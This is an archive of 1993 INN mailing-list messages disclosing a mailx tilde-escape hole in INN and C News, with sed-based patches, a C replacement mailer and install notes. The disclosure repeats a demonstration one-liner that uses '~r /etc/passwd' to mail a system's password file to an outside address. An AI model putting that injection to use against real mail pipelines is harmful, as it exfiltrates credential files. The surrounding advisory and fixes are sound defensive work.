From rsalz@uunet.uu.net Sun Dec 26 00:58:38 1993 Date: Mon, 20 Dec 93 15:28:37 -0500 From: rsalz@uunet.uu.net (Rich Salz) To: inn-gurus@uunet.UU.NET Subject: Forthcoming CERT notice Casper Dik and Tom Limoncelli found this. CERT will be posting something based on what I wrote, that follows. I will be sending out complete text in a day or two. Sigh. Who do I blame for this Mail bug -- Robert Henry, as I recall... :-) /r$ Message 69: >From rsalz Thu Dec 16 12:00:39 1993 Received: by sulphur.osf.org (1.37.109.4/4.7) id AA04756; Thu, 16 Dec 93 12:00:26 -0500 Date: Thu, 16 Dec 93 12:00:26 -0500 From: rsalz Message-Id: <9312161700.AA04756@sulphur.osf.org> To: ecd@cert.org, rsalz@osf.org Subject: Re: vu#8654 - INN mail to program Status: RO {Ed, lemme also say that I will probably post this whole note to Usenet at some point.} The problem is as follows: Most (if not all) UCB Mail (a/k/a mailx) programs interpret ~-commands even when not interactive. For example: ( echo ~t rsalz@osf.org echo ~r /etc/passwd ) | Mail will send me your password file. As a result, any program that directly pipes into mail without being careful has a hole. Both INN and C News have this capability. Usenet-specific information. As distributed, INN will mail various control messages to the news admin. This is done under the control of a program running as the news admin, with an admin-specified path. If a bad guy puts tilde-commands like those above into the body of their control message then bad things can happen. I believe that the following patch (to be applied in the samples directory of the INN distribution) will provide a work-around for INN. This is not verified, nor guaranteed; system administrators should verify all instances of MAILCMD in their INN source. Apply the patch and re-install. =================================================================== diff -c -r1.13 checkgroups *** 1.13 1993/03/18 21:04:45 --- checkgroups 1993/12/16 16:44:20 *************** *** 21,27 **** echo "${CONTROLPROGS}/docheckgroups <<-EOF-" ${SED} -e '1,/^$/d' <${ARTICLE} echo '-EOF-' ! ) | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER} ;; doit) ${SED} -e '1,/^$/d' <${ARTICLE} \ --- 21,27 ---- echo "${CONTROLPROGS}/docheckgroups <<-EOF-" ${SED} -e '1,/^$/d' <${ARTICLE} echo '-EOF-' ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER} ;; doit) ${SED} -e '1,/^$/d' <${ARTICLE} \ =================================================================== diff -c -r1.10 default *** 1.10 1993/01/29 16:52:07 --- default 1993/12/16 16:45:50 *************** *** 10,17 **** case ${ACTION} in mail) ! ${MAILCMD} -s "Unknown control message by ${FROM}" \ ! ${NEWSMASTER} <${ARTICLE} ;; doit|logit) ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \ --- 10,17 ---- case ${ACTION} in mail) ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "Unknown control message by ${FROM}" ${NEWSMASTER} ;; doit|logit) ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \ =================================================================== diff -c -r1.5 ihave *** 1.5 1992/09/14 19:21:36 --- ihave 1993/12/16 16:46:20 *************** *** 9,15 **** case ${ACTION} in mail) ! ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} <${ARTICLE} ;; doit) ## Scan the message body for articles we don't have. --- 9,16 ---- case ${ACTION} in mail) ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} ;; doit) ## Scan the message body for articles we don't have. =================================================================== diff -c -r1.16 rmgroup *** 1.16 1993/03/18 21:04:59 --- rmgroup 1993/12/16 16:46:42 *************** *** 21,27 **** echo " ${NEWSBIN}/ctlinnd rmgroup ${P1}" echo '' echo 'The full article was:' ! cat ${ARTICLE} ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER} exit ;; --- 21,27 ---- echo " ${NEWSBIN}/ctlinnd rmgroup ${P1}" echo '' echo 'The full article was:' ! sed -e 's/^~/~~/' ${ARTICLE} ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER} exit ;; =================================================================== diff -c -r1.4 sendme *** 1.4 1992/09/14 19:21:48 --- sendme 1993/12/16 16:47:03 *************** *** 9,15 **** case ${ACTION} in mail) ! ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER} <${ARTICLE} ;; doit) ## Scan the message body. --- 9,16 ---- case ${ACTION} in mail) ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER} ;; doit) ## Scan the message body. =================================================================== diff -c -r1.12 sendsys *** 1.12 1992/09/14 19:21:48 --- sendsys 1993/12/16 16:50:50 *************** *** 29,35 **** echo '' echo 'The full article was:' cat ${ARTICLE} ! ) | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE} --- 29,35 ---- echo '' echo 'The full article was:' cat ${ARTICLE} ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE} *************** *** 38,44 **** case "$1" in "") ${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS} ! ${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER} <${ARTICLE} ;; *) ${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP} --- 38,45 ---- case "$1" in "") ${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS} ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER} ;; *) ${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP} *************** *** 45,52 **** trap 'rm -f ${TEMP} ; exit' 1 2 3 15 if [ -s ${TEMP} ] ; then ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP} ! ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \ ! ${NEWSMASTER} <${ARTICLE} fi rm -f ${TEMP} ;; --- 46,54 ---- trap 'rm -f ${TEMP} ; exit' 1 2 3 15 if [ -s ${TEMP} ] ; then ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP} ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \ ! ${NEWSMASTER} fi rm -f ${TEMP} ;; =================================================================== diff -c -r1.4 senduuname *** 1.4 1992/09/14 19:21:49 --- senduuname 1993/12/16 16:51:21 *************** *** 17,23 **** echo " uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE} --- 17,23 ---- echo " uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE} =================================================================== diff -c -r1.23 version *** 1.23 1993/03/18 21:05:06 --- version 1993/12/16 16:51:40 *************** *** 21,27 **** echo " echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE} --- 21,27 ---- echo " echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE} =================================================================== diff -c -r1.3 writelog *** 1.3 1993/03/18 21:05:07 --- writelog 1993/12/16 16:51:59 *************** *** 26,32 **** exit 0 ;; Xmail) ! ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER} exit 0 ;; esac --- 26,32 ---- exit 0 ;; Xmail) ! sed -e 's/^~/~~/' | ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER} exit 0 ;; esac C News has the same problem, although it is less likely to happen since C News does not document how to mail control messages, and even then you can only mail newgroup messages. The fix is as follows, to be applied in the relay/ctl directory. Apply this patch then re-install. *** newgroup.new Thu Dec 16 11:56:54 1993 --- newgroup Tue Sep 8 20:49:04 1992 *************** *** 119,125 **** echo '===' ;; esac ! ) | sed -e 's/^~/~~/' | mail $NEWSMASTER ;; esac exit --- 119,125 ---- echo '===' ;; esac ! ) | mail $NEWSMASTER ;; esac exit ----------- End Forwarded Message ----------- From jis@MIT.EDU Sun Dec 26 01:02:08 1993 Date: Mon, 20 Dec 93 22:36:46 -0500 From: Jeffrey I. Schiller Sender: jis@MIT.EDU To: marthag@MIT.EDU, ghudson@MIT.EDU, mhpower@MIT.EDU, marc@MIT.EDU Subject: [anselmo@nic.near.net: Security hole(s) in C news and INN] To: nearnet-security@nic.near.net Subject: Security hole(s) in C news and INN Date: Mon, 20 Dec 1993 17:44:22 -0500 From: Ed Anselmo This came across on the INN developers list this afternoon. I guess we can all expect a CERT advisory on this (sometime). For a description of the problem, see "The problem is as follows:" section. Tentative fixes for INN and C news sites are included. -- Ed ------- Forwarded Message Date: Mon, 20 Dec 93 15:28:37 -0500 From: Rich Salz Message-Id: <9312202028.AA00979@rodan.UU.NET> To: inn-gurus@uunet.uu.net Subject: Forthcoming CERT notice Casper Dik and Tom Limoncelli found this. CERT will be posting something based on what I wrote, that follows. I will be sending out complete text in a day or two. Sigh. Who do I blame for this Mail bug -- Robert Henry, as I recall... :-) /r$ Message 69: >From rsalz Thu Dec 16 12:00:39 1993 Received: by sulphur.osf.org (1.37.109.4/4.7) id AA04756; Thu, 16 Dec 93 12:00:26 -0500 Date: Thu, 16 Dec 93 12:00:26 -0500 From: rsalz Message-Id: <9312161700.AA04756@sulphur.osf.org> To: ecd@cert.org, rsalz@osf.org Subject: Re: vu#8654 - INN mail to program Status: RO {Ed, lemme also say that I will probably post this whole note to Usenet at some point.} The problem is as follows: Most (if not all) UCB Mail (a/k/a mailx) programs interpret ~-commands even when not interactive. For example: ( echo ~t rsalz@osf.org echo ~r /etc/passwd ) | Mail will send me your password file. As a result, any program that directly pipes into mail without being careful has a hole. Both INN and C News have this capability. Usenet-specific information. As distributed, INN will mail various control messages to the news admin. This is done under the control of a program running as the news admin, with an admin-specified path. If a bad guy puts tilde-commands like those above into the body of their control message then bad things can happen. I believe that the following patch (to be applied in the samples directory of the INN distribution) will provide a work-around for INN. This is not verified, nor guaranteed; system administrators should verify all instances of MAILCMD in their INN source. Apply the patch and re-install. =================================================================== diff -c -r1.13 checkgroups *** 1.13 1993/03/18 21:04:45 - --- checkgroups 1993/12/16 16:44:20 *************** *** 21,27 **** echo "${CONTROLPROGS}/docheckgroups <<-EOF-" ${SED} -e '1,/^$/d' <${ARTICLE} echo '-EOF-' ! ) | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER} ;; doit) ${SED} -e '1,/^$/d' <${ARTICLE} \ - --- 21,27 ---- echo "${CONTROLPROGS}/docheckgroups <<-EOF-" ${SED} -e '1,/^$/d' <${ARTICLE} echo '-EOF-' ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER} ;; doit) ${SED} -e '1,/^$/d' <${ARTICLE} \ =================================================================== diff -c -r1.10 default *** 1.10 1993/01/29 16:52:07 - --- default 1993/12/16 16:45:50 *************** *** 10,17 **** case ${ACTION} in mail) ! ${MAILCMD} -s "Unknown control message by ${FROM}" \ ! ${NEWSMASTER} <${ARTICLE} ;; doit|logit) ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \ - --- 10,17 ---- case ${ACTION} in mail) ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "Unknown control message by ${FROM}" ${NEWSMASTER} ;; doit|logit) ${WRITELOG} ${LOGFILE} "Unknown control message by ${FROM}" \ =================================================================== diff -c -r1.5 ihave *** 1.5 1992/09/14 19:21:36 - --- ihave 1993/12/16 16:46:20 *************** *** 9,15 **** case ${ACTION} in mail) ! ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} <${ARTICLE} ;; doit) ## Scan the message body for articles we don't have. - --- 9,16 ---- case ${ACTION} in mail) ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "ihave by ${FROM}" ${NEWSMASTER} ;; doit) ## Scan the message body for articles we don't have. =================================================================== diff -c -r1.16 rmgroup *** 1.16 1993/03/18 21:04:59 - --- rmgroup 1993/12/16 16:46:42 *************** *** 21,27 **** echo " ${NEWSBIN}/ctlinnd rmgroup ${P1}" echo '' echo 'The full article was:' ! cat ${ARTICLE} ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER} exit ;; - --- 21,27 ---- echo " ${NEWSBIN}/ctlinnd rmgroup ${P1}" echo '' echo 'The full article was:' ! sed -e 's/^~/~~/' ${ARTICLE} ) | ${MAILCMD} -s "rmgroup $1 by ${FROM}" ${NEWSMASTER} exit ;; =================================================================== diff -c -r1.4 sendme *** 1.4 1992/09/14 19:21:48 - --- sendme 1993/12/16 16:47:03 *************** *** 9,15 **** case ${ACTION} in mail) ! ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER} <${ARTICLE} ;; doit) ## Scan the message body. - --- 9,16 ---- case ${ACTION} in mail) ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "sendme by ${FROM}" ${NEWSMASTER} ;; doit) ## Scan the message body. =================================================================== diff -c -r1.12 sendsys *** 1.12 1992/09/14 19:21:48 - --- sendsys 1993/12/16 16:50:50 *************** *** 29,35 **** echo '' echo 'The full article was:' cat ${ARTICLE} ! ) | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE} - --- 29,35 ---- echo '' echo 'The full article was:' cat ${ARTICLE} ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "sendsys by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "sendsys by ${FROM}; reply skipped" <${ARTICLE} *************** *** 38,44 **** case "$1" in "") ${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS} ! ${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER} <${ARTICLE} ;; *) ${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP} - --- 38,45 ---- case "$1" in "") ${MAILCMD} -s "${SUBJECT}" ${REPLYTO} <${NEWSFEEDS} ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "sendsys by ${FROM}; reply sent" ${NEWSMASTER} ;; *) ${AWK} "/^$1"'[/:\\]/,/[^\\]$/' ${NEWSFEEDS} >${TEMP} *************** *** 45,52 **** trap 'rm -f ${TEMP} ; exit' 1 2 3 15 if [ -s ${TEMP} ] ; then ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP} ! ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \ ! ${NEWSMASTER} <${ARTICLE} fi rm -f ${TEMP} ;; - --- 46,54 ---- trap 'rm -f ${TEMP} ; exit' 1 2 3 15 if [ -s ${TEMP} ] ; then ${MAILCMD} -s "${SUBJECT} for $1" ${REPLYTO} <${TEMP} ! sed -e 's/^~/~~/' <${ARTICLE} \ ! | ${MAILCMD} -s "sendsys $1 by ${FROM}; reply sent" \ ! ${NEWSMASTER} fi rm -f ${TEMP} ;; =================================================================== diff -c -r1.4 senduuname *** 1.4 1992/09/14 19:21:49 - --- senduuname 1993/12/16 16:51:21 *************** *** 17,23 **** echo " uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE} - --- 17,23 ---- echo " uuname | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "senduuname by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "senduuname by ${FROM}; reply skipped" <${ARTICLE} =================================================================== diff -c -r1.23 version *** 1.23 1993/03/18 21:05:06 - --- version 1993/12/16 16:51:40 *************** *** 21,27 **** echo " echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE} - --- 21,27 ---- echo " echo InterNetNews ${VERSION} | ${MAILCMD} -s \"${SUBJECT}\" ${FROM}" echo 'The full article was:' cat ${ARTICLE} ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "version by ${FROM}" ${NEWSMASTER} ;; logit) ${WRITELOG} ${LOGFILE} "version by ${FROM}; reply skipped" <${ARTICLE} =================================================================== diff -c -r1.3 writelog *** 1.3 1993/03/18 21:05:07 - --- writelog 1993/12/16 16:51:59 *************** *** 26,32 **** exit 0 ;; Xmail) ! ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER} exit 0 ;; esac - --- 26,32 ---- exit 0 ;; Xmail) ! sed -e 's/^~/~~/' | ${MAILCMD} -s "${MESSAGE}" ${NEWSMASTER} exit 0 ;; esac C News has the same problem, although it is less likely to happen since C News does not document how to mail control messages, and even then you can only mail newgroup messages. The fix is as follows, to be applied in the relay/ctl directory. Apply this patch then re-install. *** newgroup.new Thu Dec 16 11:56:54 1993 - --- newgroup Tue Sep 8 20:49:04 1992 *************** *** 119,125 **** echo '===' ;; esac ! ) | sed -e 's/^~/~~/' | mail $NEWSMASTER ;; esac exit - --- 119,125 ---- echo '===' ;; esac ! ) | mail $NEWSMASTER ;; esac exit - ----------- End Forwarded Message ----------- ------- End of Forwarded Message From paul@vix.com Sun Dec 26 01:02:10 1993 Date: Mon, 20 Dec 93 21:55:00 -0800 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us To: inn-gurus@uunet.UU.NET From: paul@vix.com (Paul A Vixie) Subject: Re: Forthcoming CERT notice Organization: Vixie Enterprises References: <9312202047.AA02717@rodan.UU.NET> Nntp-Posting-Host: office.home.vix.com In-Reply-To: rsalz@uunet.uu.net's message of 20 Dec 1993 12:52:25 -0800 >> you can pipe to anything that knows the "-s" flag ... for some reason i considered this a challenge. it took about two hours, mostly because my son is sick and i was on dinner duty. all new code -- please include in INN if there's room and need. /* mailto - trivial replacement for ucbmail/mailx for sending mail only * vixie 20dec93 [original] * * $Id:$ */ #include #include #include #include #include #if BSD >= 199103 # include #else # define _PATH_SENDMAIL "/usr/lib/sendmail" #endif extern char *optarg; extern int optind, optopt, opterr; struct list { struct list *next; char *data; }; static char *ProgName = "amnesia"; static struct list *Cc = NULL, *Bcc = NULL, *To = NULL; static char *Subject = NULL; static int Verbose = 0; static int listLen(struct list *list) { int x = 0; while (list) { list = list->next; x++; } return (x); } static void listHdr(FILE *file, char *hdr, struct list *list) { for (; list; list = list->next) { fprintf(file, "%s\t%s%s\n", hdr, list->data, list->next ?"," :""); hdr = ""; } } static void mailto() { int pid, p[2], len, maxlen; FILE *sendmail; char *buf, **argv, **argp; struct list *list; #ifdef BSD maxlen = getpagesize(); #else maxlen = BUFSIZ; #endif if (pipe(p) < 0) { perror("pipe"); exit(2); } switch (pid = fork()) { case -1: perror("fork"); exit(2); /*NOTREACHED*/ case 0: /* child */ if (dup2(p[0], STDIN_FILENO) < 0) { perror("dup2"); exit(3); } close(p[0]); close(p[1]); argv = calloc(1/*path*/ + Verbose + listLen(To) + listLen(Cc) + listLen(Bcc) + 1/*NULL*/, sizeof(char *)); if (!argv) { fprintf(stderr, "%s: calloc failed\n", ProgName); exit(3); } argp = argv; *argp++ = _PATH_SENDMAIL; if (Verbose) *argp++ = "-v"; for (list = To; list; list = list->next) *argp++ = list->data; for (list = Cc; list; list = list->next) *argp++ = list->data; for (list = Bcc; list; list = list->next) *argp++ = list->data; *argp = NULL; execv(_PATH_SENDMAIL, argv); perror(_PATH_SENDMAIL); exit(3); /*NOTREACHED*/ default: /* parent */ close(p[0]); if (!(sendmail = fdopen(p[1], "w"))) { perror("fdopen"); exit(3); } if (!(buf = (char *) malloc(maxlen))) { perror("malloc"); exit(3); } listHdr(sendmail, "To:", To); listHdr(sendmail, "Cc:", Cc); if (Subject) fprintf(sendmail, "Subject: %s\n", Subject); fputc('\n', sendmail); fflush(sendmail); while (0 < (len = read(STDIN_FILENO, buf, maxlen))) { if (0 > write(p[1], buf, len)) { perror("write"); exit(3); } } if (len < 0) { perror("read"); exit(3); } if (0 > close(p[1])) { perror("close"); exit(3); } break; } } static void listAdd(struct list **head, char *data) { struct list *new = (struct list *) malloc(sizeof(struct list)); new->next = *head; new->data = (char *) malloc(strlen(data)+1); strcpy(new->data, data); *head = new; } static void usage(char *errormsg) { fprintf(stderr, "%s: command syntax error: %s\n", ProgName, errormsg); fprintf(stderr, "usage: %s [-v] [-s subject] {-c cc-addr} {-b bcc-addr} to-addr ...\n", ProgName); exit(1); } main(int argc, char *argv[]) { int optch; if (NULL != (ProgName = strrchr(argv[0], '/'))) ProgName++; else ProgName = argv[0]; while ((optch = getopt(argc, argv, "s:c:b:v")) != EOF) { switch (optch) { case 's': if (Subject) usage("-s can only be used once"); Subject = optarg; break; case 'c': listAdd(&Cc, optarg); break; case 'b': listAdd(&Bcc, optarg); break; case 'v': if (Verbose) usage("-v can only be used once"); Verbose++; break; default: usage("unrecognized option"); } } for (argc -= optind, argv += optind; argc; argc--, argv++) { listAdd(&To, *argv); } if (!To) usage("at least one to-addr must be specified"); mailto(); exit(0); } -- Paul Vixie Redwood City, CA decwrl!vixie!paul From barrett@daisy.ee.und.ac.za Sun Dec 26 01:02:12 1993 Sender: Alan P Barrett Date: Tue, 21 Dec 1993 09:06:29 +0200 (SAST) From: Alan Barrett Subject: Re: Forthcoming CERT notice To: Rich Salz Cc: inn-gurus@uunet.UU.NET In-Reply-To: <9312202028.AA00979@rodan.UU.NET> Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII > ! ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER} I would much prefer to change the definition of MAILCMD, instead of changing all instances where it is used. In config.data: _PATH_MAILCMD /usr/lib/news/bin/mailcmd In mailcmd: #!/bin/sh sed -e 's/^~/~~/' | exec /usr/ucb/Mail ${1+"$@"} Or something like that. --apb (Alan Barrett) From rsalz@uunet.uu.net Sun Dec 26 01:02:17 1993 Date: Wed, 22 Dec 93 10:26:22 -0500 From: rsalz@uunet.uu.net (Rich Salz) To: inn-gurus@uunet.UU.NET Subject: INN1.4-sec released I put INN1.4sec, an intermediate release containing the CERT fix, in the public area. Mirror sites will pick it up soon. The CERT advisory will be going out after the holiday. Anyone think I should NOT send it to nntp-managers now? If so, please let me know. /r$ From tom_limoncelli@Warren.MENTORG.COM Sun Dec 26 01:02:29 1993 From: Tom Limoncelli Subject: Re: Forthcoming CERT notice To: rsalz@uunet.UU.NET (Rich Salz) Date: Wed, 22 Dec 1993 11:02:32 -0500 (EST) Cc: inn-gurus@uunet.UU.NET In-Reply-To: <9312202028.AA00979@rodan.UU.NET> from "Rich Salz" at Dec 20, 93 03:28:37 pm Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1224 Some notes about the patch: 1. I only noticed that it affects C News until after I had read past the INN diffs (because I was installing them). Most C News users will never get that far. Maybe the header should note that it affects C News and INN and that patches for both are included. (Maybe listing C News's patch first would be a good idea). 2. No explict install instructions are included. I hate when CERT reports do that. Let's at least tell people to: 1. cd $INN/samples 2. patch -p0 (is this correct? I installed the patches by hand so I'm not sure). 3. cd $INN/site 4. rm checkgroups default ihave rmgroup sendme sendsys 5. rm senduuname version writelog newgroup 6. cd $INN ; make install 3. I haven't downloaded INN1.4sec yet. Does it include "mailsend" or does it use "sed"? If it uses "mailsend", it should be noted in the CERT advisory that INN1.4sec fixes the problem by with a different method. Just some notes, Tom -- Tom Limoncelli -- tal@warren.mentorg.com (work) -- tal@plts.org (play) "Psst! Hey, Anthony! Y'know what I | Disclaimer: I do not like about existing?" "Uh... uh... what?" | speak for Mentor Graphics. "Possessing a physical extension." -TSA |